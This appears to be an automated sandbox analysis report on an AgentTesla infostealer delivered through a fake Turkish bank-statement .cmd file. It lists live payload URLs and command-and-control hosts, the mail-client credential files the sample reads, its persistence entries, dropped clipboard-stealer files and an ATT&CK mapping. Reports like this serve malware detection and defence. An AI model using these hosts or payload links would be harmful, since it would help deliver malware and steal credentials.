Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 12.0.neworigin.exe.6d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.4514311639.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: neworigin.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	21 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	11 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 Valid Accounts	1 Valid Accounts	11 Deobfuscate/Decode Files or Information	21 Input Capture	1 System Network Connections Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Shared Modules	1 Scheduled Task/Job	1 Access Token Manipulation	3 Obfuscated Files or Information	1 Credentials in Registry	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 Command and Scripting Interpreter	21 Registry Run Keys / Startup Folder	311 Process Injection	1 Timestomp	NTDS	47 System Information Discovery	Distributed Component Object Model	21 Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 Scheduled Task/Job	Network Logon Script	1 Scheduled Task/Job	1 DLL Side-Loading	LSA Secrets	1 Query Registry	SSH	1 Clipboard Data	123 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	21 Registry Run Keys / Startup Folder	311 Masquerading	Cached Domain Credentials	331 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Valid Accounts	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	151 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	311 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Avira	TR/Spy.Gen8
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Avira	HEUR/AGEN.1311721
C:\Users\user\AppData\Local\Temp\neworigin.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\server_BTC.exe	100%	Joe Sandbox ML
C:\Users\Public\Libraries\lxsyrsiW.pif	3%	ReversingLabs
C:\Users\Public\alpha.pif	0%	ReversingLabs
C:\Users\Public\xpha.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\neworigin.exe	88%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Local\Temp\server_BTC.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker
C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	66%	ReversingLabs	ByteCode-MSIL.Infostealer.ClipBanker

Source	Detection	Scanner	Label
http://r11.o.lencr.	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfssexe	0%	Avira URL Cloud	safe
http://r11.i.lencr.8	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfss&	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysxlfss	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_Wisrysx	0%	Avira URL Cloud	safe
https://gxe0.com/yak/233_WisrysxlfssyjHq	0%	Avira URL Cloud	safe
http://s82.gocheapweb.com	0%	Avira URL Cloud	safe
https://gxe0.com/O	0%	Avira URL Cloud	safe
http://r11.o.le7	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
gxe0.com	198.252.105.91	true	false	high
api.ipify.org	104.26.13.205	true	false	high
s82.gocheapweb.com	51.195.88.199	true	false	high
pywolwnvd.biz	54.244.188.177	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false		high
https://gxe0.com/yak/233_Wisrysxlfss	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfssexe	x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gxe0.com/yak/233_Wisrysx	x.exe, 00000004.00000002.2182528595.0000000020B7D000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://account.dyn.com/	neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	false		high
http://r11.o.lencr.org0#	neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 0000000E.00000002.2212077156.00000000050ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004EE3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.o.lencr.	neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org/t	neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2302123320.0000000007454000.00000004.00000020.00020000.00000000.sdmp	false		high
http://r11.i.lencr.org/0	neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_WisrysxlfssyjHq	x.exe, 00000004.00000002.2126176510.0000000000915000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ipify.org	neworigin.exe, 0000000C.00000000.2125602998.00000000006D2000.00000002.00000001.01000000.00000009.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://r11.i.lencr.8	neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB	powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/yak/233_Wisrysxlfss&	x.exe, 00000004.00000002.2126176510.00000000008BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	neworigin.exe, 0000000C.00000002.2287190785.0000000002AE3000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000CD4000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2383520732.00000000060D5000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2265070833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2413352721.00000000061C8000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539815193.0000000006500000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4504456785.0000000001006000.00000004.00000020.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4539643971.0000000006430000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000E.00000002.2212077156.00000000048E5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 0000000E.00000002.2245714241.00000000057FA000.00000004.00000800.00020000.00000000.sdmp	false		high
http://s82.gocheapweb.com	neworigin.exe, 0000000C.00000002.2287190785.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000000C.00000002.2287190785.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001F.00000002.4514311639.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	neworigin.exe, 0000000C.00000002.2287190785.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2212077156.0000000004791000.00000004.00000800.00020000.00000000.sdmp, neworigin.exe, 0000001B.00000002.2382397061.00000000029DC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gxe0.com/O	x.exe, 00000004.00000002.2126176510.0000000000932000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.pmail.com	x.exe, x.exe, 00000004.00000002.2209045342.000000007FC4F000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2139373046.0000000002DBE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055485949.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2191475072.0000000021E50000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2129637377.0000000000986000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2182528595.0000000020A88000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2054794048.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2192001973.0000000021FFF000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2136598756.0000000002BF7000.00000004.00000020.00020000.00000000.sdmp, lxsyrsiW.pif, 0000000B.00000000.2121761760.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 00000019.00000002.2273295756.0000000002D22000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001A.00000000.2241974953.0000000000416000.00000002.00000001.01000000.00000007.sdmp, Wisrysxl.PIF, 0000001D.00000002.2353180844.0000000002CB2000.00000004.00001000.00020000.00000000.sdmp, lxsyrsiW.pif, 0000001E.00000000.2324372148.0000000000416000.00000002.00000001.01000000.00000007.sdmp	false		high
http://r11.o.le7	neworigin.exe, 0000001B.00000002.2347491465.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.252.105.91	gxe0.com	Canada	20068	HAWKHOSTCA	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false
51.195.88.199	s82.gocheapweb.com	France	16276	OVHFR	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554476
Start date and time:	2024-11-12 15:27:14 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 13m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	35
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd
Detection:	MAL
Classification:	mal100.spre.troj.spyw.evad.winCMD@54/27@5/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 98% Number of executed functions: 254 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .cmd Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target TrojanAIbot.exe, PID 7184 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5148 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 6788 because it is empty
Execution Graph export aborted for target server_BTC.exe, PID 7612 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd

Simulations

Behavior and APIs

Time	Type	Description
09:28:08	API Interceptor	2x Sleep call for process: x.exe modified
09:28:20	API Interceptor	5754721x Sleep call for process: neworigin.exe modified
09:28:21	API Interceptor	2655494x Sleep call for process: TrojanAIbot.exe modified
09:28:21	API Interceptor	15x Sleep call for process: powershell.exe modified
09:28:26	API Interceptor	2x Sleep call for process: Wisrysxl.PIF modified
15:28:16	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
15:28:21	Task Scheduler	Run new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
15:28:25	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Wisrysxl C:\Users\Public\Wisrysxl.url
15:28:33	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
198.252.105.91	DHL-INVOICE-MBV.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.legaldanaa.com/d0ad/?jXu=gWBUvkz7Th1w/4or5wJyBYQATVQKYMhDH/gPz8FNlyuh7t8wp+tSlul7hgK6xuyfJYQ1BxvuzK7AKBkx6IgPVHnLyXh5nXmxBA==&hZ=5jUpdPs
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
51.195.88.199	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse
	ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s82.gocheapweb.com	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	New_Order_PO_GM5637H93.exe	Get hash	malicious	AgentTesla, PureLog Stealer, RedLine, XWorm	Browse	51.195.88.199
	New_Order_PO_GM5637H93.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
	AENiBH7X1q.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	New_Order_568330_Material_Specifications.exe	Get hash	malicious	AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm	Browse	51.195.88.199
	RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe	Get hash	malicious	PureLog Stealer, RedLine	Browse	51.195.88.199
	RFQ -PO.20571-0001-QBMS-PRQ-0200140.js	Get hash	malicious	AgentTesla, RedLine	Browse	51.195.88.199
	ORDER_DOCU_NWQ89403984-DETAILS.MPEG.PNG.CMD.cmd	Get hash	malicious	AgentTesla, DBatLoader	Browse	51.195.88.199
api.ipify.org	Booking_0731520.vbe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Purchase order.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editor	Get hash	malicious	Unknown	Browse	104.26.13.205
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat	Get hash	malicious	AgentTesla, DBatLoader	Browse	104.26.12.205
	Swift Copy.bat.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.26.13.205
	Pago por adelantado_ USD 72000 (50%).exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
